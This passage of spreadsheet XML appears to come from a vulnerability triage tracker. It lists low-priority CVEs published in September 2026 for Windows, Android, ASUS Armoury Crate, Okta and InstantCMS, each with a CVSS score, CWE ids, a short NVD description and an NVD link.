s="5" t="n"><v>5.7</v></c><c r="E1222" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1222" s="5" t="inlineStr" /><c r="H1222" s="5" t="n"><v>0.006</v></c><c r="I1222" s="5" t="inlineStr" /><c r="J1222" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1222" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1222" s="5" t="inlineStr" /><c r="M1222" s="5" t="inlineStr" /><c r="N1222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1222" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1222" s="5" t="inlineStr" /><c r="R1222" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1222" s="5" t="inlineStr"><is><t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t></is></c></row><row r="1223"><c r="A1223" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1223" s="5" t="inlineStr"><is><t>CVE-2026-69507</t></is></c><c r="D1223" s="5" t="n"><v>5.7</v></c><c r="E1223" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1223" s="5" t="inlineStr" /><c r="H1223" s="5" t="n"><v>0.008</v></c><c r="I1223" s="5" t="inlineStr" /><c r="J1223" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1223" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1223" s="5" t="inlineStr" /><c r="M1223" s="5" t="inlineStr" /><c r="N1223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1223" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1223" s="5" t="inlineStr" /><c r="R1223" s="5" t="inlineStr"><is><t>CWE-538</t></is></c><c r="S1223" s="5" t="inlineStr"><is><t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t></is></c></row><row r="1224"><c r="A1224" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1224" s="5" t="inlineStr"><is><t>CVE-2026-69552</t></is></c><c r="D1224" s="5" t="n"><v>5.7</v></c><c r="E1224" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1224" s="5" t="inlineStr" /><c r="H1224" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1224" s="5" t="inlineStr" /><c r="J1224" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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24" s="5" t="inlineStr" /><c r="M1224" s="5" t="inlineStr" /><c r="N1224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1224" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1224" s="5" t="inlineStr" /><c r="R1224" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1224" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t></is></c></row><row r="1225"><c r="A1225" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1225" s="5" t="inlineStr"><is><t>CVE-2026-69569</t></is></c><c r="D1225" s="5" t="n"><v>5.7</v></c><c r="E1225" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1225" s="5" t="inlineStr" /><c r="H1225" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1225" s="5" t="inlineStr" /><c r="J1225" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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25" s="5" t="inlineStr" /><c r="M1225" s="5" t="inlineStr" /><c r="N1225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1225" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1225" s="5" t="inlineStr" /><c r="R1225" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1225" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t></is></c><c r="T1225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t></is></c></row><row r="1226"><c r="A1226" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1226" s="5" t="inlineStr"><is><t>CVE-2026-69572</t></is></c><c r="D1226" s="5" t="n"><v>5.7</v></c><c r="E1226" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1226" s="5" t="inlineStr" /><c r="H1226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1226" s="5" t="inlineStr" /><c r="J1226" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K122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26" s="5" t="inlineStr" /><c r="M1226" s="5" t="inlineStr" /><c r="N1226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1226" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1226" s="5" t="inlineStr" /><c r="R1226" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1226" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t></is></c></row><row r="1227"><c r="A1227" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1227" s="5" t="inlineStr"><is><t>CVE-2026-69591</t></is></c><c r="D1227" s="5" t="n"><v>5.7</v></c><c r="E1227" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1227" s="5" t="inlineStr" /><c r="H1227" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1227" s="5" t="inlineStr" /><c r="J1227" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1227"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227" s="5" t="inlineStr" /><c r="M1227" s="5" t="inlineStr" /><c r="N1227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1227" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1227" s="5" t="inlineStr" /><c r="R1227" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1227" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t></is></c></row><row r="1228"><c r="A1228" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1228" s="5" t="inlineStr"><is><t>CVE-2026-69637</t></is></c><c r="D1228" s="5" t="n"><v>5.7</v></c><c r="E1228" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1228" s="5" t="inlineStr" /><c r="H1228" s="5" t="n"><v>0.006</v></c><c r="I1228" s="5" t="inlineStr" /><c r="J1228" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1228" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1228" s="5" t="inlineStr" /><c r="M1228" s="5" t="inlineStr" /><c r="N1228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1228" s="5" t="inlineStr" /><c r="R1228" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1228" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t></is></c></row><row r="1229"><c r="A1229" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1229" s="5" t="inlineStr"><is><t>CVE-2026-69679</t></is></c><c r="D1229" s="5" t="n"><v>5.7</v></c><c r="E1229" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1229" s="5" t="inlineStr" /><c r="H1229" s="5" t="n"><v>0.006</v></c><c r="I1229" s="5" t="inlineStr" /><c r="J1229" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1229" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1229" s="5" t="inlineStr" /><c r="M1229" s="5" t="inlineStr" /><c r="N1229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1229" s="5" t="inlineStr" /><c r="R1229" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1229" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t></is></c></row><row r="1230"><c r="A1230" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1230" s="5" t="inlineStr"><is><t>CVE-2026-69723</t></is></c><c r="D1230" s="5" t="n"><v>5.7</v></c><c r="E1230" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1230" s="5" t="inlineStr" /><c r="H1230" s="5" t="n"><v>0.01</v></c><c r="I1230" s="5" t="inlineStr" /><c r="J1230" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K123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30" s="5" t="inlineStr" /><c r="M1230" s="5" t="inlineStr" /><c r="N1230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1230" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1230" s="5" t="inlineStr" /><c r="R1230" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1230" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t></is></c></row><row r="1231"><c r="A1231" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1231" s="5" t="inlineStr"><is><t>CVE-2026-75808</t></is></c><c r="D1231" s="5" t="n"><v>5.7</v></c><c r="E1231" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1231" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1231" s="5" t="inlineStr" /><c r="H1231" s="5" t="n"><v>0.001</v></c><c r="I1231" s="5" t="inlineStr" /><c r="J1231" s="5" t="inlineStr" /><c r="K1231" s="5" t="inlineStr" /><c r="L1231" s="5" t="inlineStr" /><c r="M1231" s="5" t="inlineStr" /><c r="N1231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1231" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1231" s="5" t="inlineStr" /><c r="R1231" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1231" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling in ASUS Armoury Crate allows a local user to cause a denial-of-service condition through system memory exhaustion by bypassing driver authentication and allocating an unrestricted amount of memory.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75808</t></is></c></row><row r="1232"><c r="A1232" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1232" s="5" t="inlineStr"><is><t>CVE-2026-75810</t></is></c><c r="D1232" s="5" t="n"><v>5.7</v></c><c r="E1232" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1232" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1232" s="5" t="inlineStr" /><c r="H1232" s="5" t="n"><v>0.001</v></c><c r="I1232" s="5" t="inlineStr" /><c r="J1232" s="5" t="inlineStr" /><c r="K1232" s="5" t="inlineStr" /><c r="L1232" s="5" t="inlineStr" /><c r="M1232" s="5" t="inlineStr" /><c r="N1232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1232" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1232" s="5" t="inlineStr" /><c r="R1232" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S1232" s="5" t="inlineStr"><is><t>Exposed Dangerous Method or Function in ASUS Armoury Crate allow a local user to cause a brief system stall by bypassing driver authentication and sending requests to trigger system management interrupts (SMIs). Repeatedly triggering SMI may lead to a denial-of-service (DoS) condition.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75810</t></is></c></row><row r="1233"><c r="A1233" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1233" s="5" t="inlineStr"><is><t>CVE-2026-78629</t></is></c><c r="D1233" s="5" t="n"><v>5.6</v></c><c r="E1233" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1233" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1233" s="5" t="inlineStr" /><c r="H1233" s="5" t="n"><v>0.001</v></c><c r="I1233" s="5" t="inlineStr" /><c r="J1233" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1233" s="5" t="inlineStr" /><c r="L1233" s="5" t="inlineStr" /><c r="M1233" s="5" t="inlineStr" /><c r="N1233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1233" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1233" s="5" t="inlineStr" /><c r="R1233" s="5" t="inlineStr"><is><t>CWE-303</t></is></c><c r="S1233" s="5" t="inlineStr"><is><t>The Okta Hyperdrive agent plugin returns a success response without a signed SAML assertion when the organization's policy requires no MFA for a given user. The response contains only a bare boolean validation indicator with no cryptographic artifact, resulting in an unverifiable authentication verdict being delivered to the relying application.</t></is></c><c r="T1233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t></is></c></row><row r="1234"><c r="A1234" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1234" s="5" t="inlineStr"><is><t>CVE-2026-28584</t></is></c><c r="D1234" s="5" t="n"><v>5.5</v></c><c r="E1234" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1234" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1234" s="5" t="inlineStr" /><c r="H1234" s="5" t="n"><v>0.001</v></c><c r="I1234" s="5" t="inlineStr" /><c r="J1234" s="5" t="inlineStr" /><c r="K1234" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1234" s="5" t="inlineStr" /><c r="M1234" s="5" t="inlineStr" /><c r="N1234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1234" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1234" s="5" t="inlineStr" /><c r="R1234" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1234" s="5" t="inlineStr"><is><t>In createSessionInternal of PackageInstallerService.java, there is a possible way to permanently DoS the device due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t></is></c></row><row r="1235"><c r="A1235" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1235" s="5" t="inlineStr"><is><t>CVE-2026-28596</t></is></c><c r="D1235" s="5" t="n"><v>5.5</v></c><c r="E1235" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1235" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1235" s="5" t="inlineStr" /><c r="H1235" s="5" t="n"><v>0.001</v></c><c r="I1235" s="5" t="inlineStr" /><c r="J1235" s="5" t="inlineStr" /><c r="K1235" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1235" s="5" t="inlineStr" /><c r="M1235" s="5" t="inlineStr" /><c r="N1235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1235" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1235" s="5" t="inlineStr" /><c r="R1235" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1235" s="5" t="inlineStr"><is><t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t></is></c></row><row r="1236"><c r="A1236" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1236" s="5" t="inlineStr"><is><t>CVE-2026-28617</t></is></c><c r="D1236" s="5" t="n"><v>5.5</v></c><c r="E1236" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1236" s="5" t="inlineStr" /><c r="H1236" s="5" t="n"><v>0.001</v></c><c r="I1236" s="5" t="inlineStr" /><c r="J1236" s="5" t="inlineStr" /><c r="K1236" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1236" s="5" t="inlineStr" /><c r="M1236" s="5" t="inlineStr" /><c r="N1236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1236" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1236" s="5" t="inlineStr" /><c r="R1236" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1236" s="5" t="inlineStr"><is><t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t></is></c></row><row r="1237"><c r="A1237" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1237" s="5" t="inlineStr"><is><t>CVE-2026-28633</t></is></c><c r="D1237" s="5" t="n"><v>5.5</v></c><c r="E1237" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1237" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1237" s="5" t="inlineStr" /><c r="H1237" s="5" t="n"><v>0.001</v></c><c r="I1237" s="5" t="inlineStr" /><c r="J1237" s="5" t="inlineStr" /><c r="K1237" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1237" s="5" t="inlineStr" /><c r="M1237" s="5" t="inlineStr" /><c r="N1237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1237" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1237" s="5" t="inlineStr" /><c r="R1237" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1237" s="5" t="inlineStr"><is><t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t></is></c></row><row r="1238"><c r="A1238" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1238" s="5" t="inlineStr"><is><t>CVE-2026-49883</t></is></c><c r="D1238" s="5" t="n"><v>5.5</v></c><c r="E1238" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1238" s="5" t="inlineStr" /><c r="H1238" s="5" t="n"><v>0.001</v></c><c r="I1238" s="5" t="inlineStr" /><c r="J1238" s="5" t="inlineStr" /><c r="K1238" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1238" s="5" t="inlineStr" /><c r="M1238" s="5" t="inlineStr" /><c r="N1238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1238" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1238" s="5" t="inlineStr" /><c r="R1238" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S1238" s="5" t="inlineStr"><is><t>In checkReadPermission of PermissionsManager.java, there is a possible way to monitor sensitive device state data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49883</t></is></c></row><row r="1239"><c r="A1239" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1239" s="5" t="inlineStr"><is><t>CVE-2026-54611</t></is></c><c r="D1239" s="5" t="n"><v>5.5</v></c><c r="E1239" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1239" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1239" s="5" t="inlineStr" /><c r="H1239" s="5" t="n"><v>0.005</v></c><c r="I1239" s="5" t="inlineStr" /><c r="J1239" s="5" t="inlineStr" /><c r="K1239" s="5" t="inlineStr" /><c r="L1239" s="5" t="inlineStr" /><c r="M1239" s="5" t="inlineStr" /><c r="N1239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1239" s="5" t="inlineStr" /><c r="R1239" s="5" t="inlineStr"><is><t>CWE-434, CWE-94</t></is></c><c r="S1239" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t></is></c><c r="T1239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t></is></c></row><row r="1240"><c r="A1240" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1240" s="5" t="inlineStr"><is><t>CVE-2026-68830</t></is></c><c r="D1240" s="5" t="n"><v>5.5</v></c><c r="E1240" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1240" s="5" t="inlineStr" /><c r="H1240" s="5" t="n"><v>0.003</v></c><c r="I1240" s="5" t="inlineStr" /><c r="J1240" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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40" s="5" t="inlineStr" /><c r="M1240" s="5" t="inlineStr" /><c r="N1240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1240" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1240" s="5" t="inlineStr" /><c r="R1240" s="5" t="inlineStr"><is><t>CWE-269, CWE-59</t></is></c><c r="S1240" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t></is></c></row><row r="1241"><c r="A1241" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1241" s="5" t="inlineStr"><is><t>CVE-2026-68831</t></is></c><c r="D1241" s="5" t="n"><v>5.5</v></c><c r="E1241" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1241" s="5" t="inlineStr" /><c r="H1241" s="5" t="n"><v>0.003</v></c><c r="I1241" s="5" t="inlineStr" /><c r="J1241" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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41" s="5" t="inlineStr" /><c r="M1241" s="5" t="inlineStr" /><c r="N1241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1241" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1241" s="5" t="inlineStr" /><c r="R1241" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="S1241" s="5" t="inlineStr"><is><t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t></is></c></row><row r="1242"><c r="A1242" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1242" s="5" t="inlineStr"><is><t>CVE-2026-68842</t></is></c><c r="D1242" s="5" t="n"><v>5.5</v></c><c r="E1242" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1242" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1242" s="5" t="inlineStr" /><c r="H1242" s="5" t="n"><v>0.004</v></c><c r="I1242" s="5" t="inlineStr" /><c r="J1242" s="5" t="inlineStr" /><c r="K1242" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, 